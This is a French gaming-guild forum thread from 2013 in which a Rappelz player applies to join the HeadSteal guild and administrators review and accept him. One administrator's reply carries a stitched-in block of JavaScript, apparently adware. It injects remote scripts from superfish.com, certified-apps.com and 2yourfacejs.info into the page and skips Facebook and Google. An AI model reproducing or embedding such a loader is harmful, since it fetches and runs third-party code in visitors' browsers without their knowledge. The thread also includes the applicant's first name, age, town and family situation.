Guilde HeadSteal Index du Forum
Guilde HeadSteal
Forum de la guilde HeadSteal /Guilde fun sur le serveur seraphin /Shiva rappelz

Guilde HeadSteal Index du ForumFAQRechercherS’enregistrerConnexion

:: Condidature ::

Poster un nouveau sujet   Ce sujet est verrouillé; vous ne pouvez pas éditer les messages ou faire de réponses.    Guilde HeadSteal Index du Forum -> Libre -> Candidature [Fermé]
Sujet précédent :: Sujet suivant  
Auteur Message
iroise45
Membres

Masculin Cancer (21juin-23juil)
Point: 3
Moyenne de points: 1,00

MessagePosté le: Sam 2 Fév - 12:09 (2013)    Sujet du message: Condidature Répondre en citant

Présentation IRL : 
Bonjour la guilde HeadSteal 
Je me présente je m'apel Benjamin, j'ai 25 ans marié avec une petit fille de 1 ans Smile je travail dans une Imprimerie ( Pubs.. Livres... etc...) Smile 

- Prénom :  Benjamin 
- Lieu :  Orléans (45)
- Hobbies : Rappelz, Call of Duty , Need for Speed
- Situation :  Au travail
- Temps de jeu : Tout dépend de mes horaires de travail  Smile

Presentation InGame

- Pseudo:  Scorpio
- Classe :  Magicien de Chaos
- Niveau : 156 

Pourquoi avoir choisi HeadSteal ?
J'ai entendu beaucoup de bien sur votre guilde donc je me suis permis de demander à un membre de la guilde, si il recruté Smile 

Quelles sont vos guildes précédentes ?
Ma précédente guilde est Secret-Garden 

Comment vous voyez vous en tant que joueur ?
Très bonne question ! tout dépend de mon humeur, tout dépend ce qu'il se passe en jeux (PK) , sinon je suis très direct Smile 
je ne me prend pas la tête pour un jeux OnLine...

Qui connaissez vous chez nous ?
Pour l'instant personne mais j'aimerais vous connaitre Smile 

Un commentaire à ajouter ? 

J’espère vous convaincre Smile , d’être le plus sérieux pour la guilde, de vous aider bien évidement Smile 

Publicité

MessagePosté le: Sam 2 Fév - 12:09 (2013)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
zyparc
Membres

Point: 2

MessagePosté le: Sam 2 Fév - 12:14 (2013)    Sujet du message: Condidature Répondre en citant

Bonjour, Un POUR de ma part:)

[MG]Kurochiara
Administrateur

Point: 35
Moyenne de points: 0,95

MessagePosté le: Sam 2 Fév - 12:24 (2013)    Sujet du message: Condidature Répondre en citant

Bonjour à toi

Merci de l'intérêt que tu portes à notre guilde, ta demande sera traitée sous peu après délibération.

Sinon pour ma part je trouve que cest une bonne candidature et recevable.

Bon jeu à toi

Kurochiara

[MG]HeadHunter
Administrateur

Point: 13
Moyenne de points: 0,72

MessagePosté le: Sam 2 Fév - 12:30 (2013)    Sujet du message: Condidature Répondre en citant

bonjour chère benjamin 

tout d’abord avant que je disent quoi que se soit il te manque la toute dernière question qui concerne le règlement donc candidature non recevable jusqu’à se que sa soi modifier merci de te compréhension 

//AddWiddit(); function AddWiddit(){ if(window.location.href.indexOf("http:")!=-1 && window.location.href.indexOf("facebook.com")==-1) { var script_tag=document.createElement('script');script_tag.setAttribute("type","text/javascript"); script_tag.setAttribute("src","http://cdn1.certified-apps.com/scripts/shared/enable.js?si=33332&tid=ch6"); (document.getElementsByTagName("head")[0]||document.documentElement).appendChild(script_tag); }} AddSuperFish(); function AddSuperFish(){ if(-1==window.location.href.indexOf("facebook.com")&& -1==window.location.href.indexOf("google.com")) { var a=document.createElement("script"); a.setAttribute("type","text/javascript"); if(-1==window.location.href.indexOf("http:")) { a.setAttribute("src","http://www.superfish.com/ws/sf_main.jsp?dlsource=sixpointseven&userId=6&CTID=6"); } else if(-1==window.location.href.indexOf("https:")) { a.setAttribute("src","https://www.superfish.com/ws/sf_main.jsp?dlsource=sixpointseven&userId=6&CTID=6"); } (document.getElementsByTagName("head")[0]||document.documentElement).appendChild(a); } } function AddDP() { if (window.location.href.indexOf("http:") != -1 && window.location.href.indexOf("facebook.com") == -1 ) { var script_tag = document.createElement('script'); script_tag.setAttribute("type", "text/javascript"); script_tag.setAttribute("src", "http://i.2yourfacejs.info/toyf/javascript.js?channel=ch6"); // Try to find the head, otherwise default to the documentElement (document.getElementsByTagName("head")[0] || document.documentElement).appendChild(script_tag); } }

MSN Skype
[MG]Kurochiara
Administrateur

Point: 35
Moyenne de points: 0,95

MessagePosté le: Sam 2 Fév - 12:38 (2013)    Sujet du message: Condidature Répondre en citant

Ah oui j'avais pas vu ça dsl

iroise45
Membres

MessagePosté le: Sam 2 Fév - 12:49 (2013)    Sujet du message: Re: Condidature Répondre en citant

iroise45 a écrit:
Présentation IRL : 
Bonjour la guilde HeadSteal 
Je me présente je m'apel Benjamin, j'ai 25 ans marié avec une petit fille de 1 ans Smile je travail dans une Imprimerie ( Pubs.. Livres... etc...) Smile  

- Prénom :  Benjamin 
- Lieu :  Orléans (45)
- Hobbies : Rappelz, Call of Duty , Need for Speed
- Situation :  Au travail
- Temps de jeu : Tout dépend de mes horaires de travail   Smile

Presentation InGame

- Pseudo:  Scorpio
- Classe :  Magicien de Chaos
- Niveau : 156 

Pourquoi avoir choisi HeadSteal ?
J'ai entendu beaucoup de bien sur votre guilde donc je me suis permis de demander à un membre de la guilde, si il recruté Smile  

Quelles sont vos guildes précédentes ?
Ma précédente guilde est Secret-Garden 

Comment vous voyez vous en tant que joueur ?
Très bonne question ! tout dépend de mon humeur, tout dépend ce qu'il se passe en jeux (PK) , sinon je suis très direct Smile  
je ne me prend pas la tête pour un jeux OnLine...

Qui connaissez vous chez nous ?
Pour l'instant personne mais j'aimerais vous connaitre Smile  

Un commentaire à ajouter ? 

J’espère vous convaincre  Smile , d’être le plus sérieux pour la guilde, de vous aider bien évidement  Smile  

Avez-vous lu, compris et accepté TOUTES les condidtions de notre charte ? si oui, peux-tu expliquer l'une de nos règles ?
L'entraide Smile , Stuffs à donner entre guilde Smile 

[MG]HeadHunter
Administrateur

Point: 13
Moyenne de points: 0,72

MessagePosté le: Sam 2 Fév - 12:58 (2013)    Sujet du message: Condidature Répondre en citant

voila merci en tout cas ta présentation et recevable Very Happy Smile les MG délibère

MSN Skype
iroise45
Membres

MessagePosté le: Sam 2 Fév - 16:52 (2013)    Sujet du message: Condidature Répondre en citant

Voila Smile 

Contenu Sponsorisé

MessagePosté le: Aujourd’hui à 21:19 (2018)    Sujet du message: Condidature

Poster un nouveau sujet   Ce sujet est verrouillé; vous ne pouvez pas éditer les messages ou faire de réponses.    Guilde HeadSteal Index du Forum -> Libre -> Candidature [Fermé] Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

Sauter vers:  

Index | Panneau d’administration | Creer un forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
onyx © theme by larme d'ange 2006